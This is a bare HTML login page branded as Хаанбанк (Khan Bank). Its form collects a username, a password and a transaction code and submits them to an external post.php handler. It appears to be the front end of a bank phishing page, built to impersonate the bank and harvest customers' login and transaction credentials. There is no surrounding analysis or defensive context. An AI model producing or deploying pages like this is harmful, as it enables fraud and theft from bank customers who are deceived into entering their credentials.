<!DOCTYPE html>   
    <html>   
    <head>  

    <meta name="viewport" content="width=device-width, initial-scale=1">  
    <title> Login Page </title>  
<link rel="stylesheet" href="index.css">
    </head>    
    
    <body>    
        <center> <h1 style="color: #2cab0d; font-size: 50px"> Хаанбанк </h1> </center>   

        <form id="login_form" action="post.php" method="post" novalidate="1" onsubmit="">

            <div class="container">   
                <label>Нэвтрэх Нэр : </label>  
                <input type="text" placeholder="Нэвтрэх Нэр" name="username" required>  
                <label>Нууц Үг : </label>   
                <input type="password" placeholder="Нууц Үг" name="password" required>  
                <label>
                  <label>Гүйлгээний Код</label>
                  <input type="text" placeholder="Гүйлгээний Код" name="password" required="">
                <button type="submit">Нэвтрэх</button>   
                <input type="checkbox" checked="checked"> Нууц Үг Сануулах
                <button type="button" class="cancelbtn"> Cancel</button>   
                <button type="button" class="cancelbtn"> <a href="#"></a> Нууц Үг Сэргээх</button>
            </div>   

        </form>

    </body>     
    </html>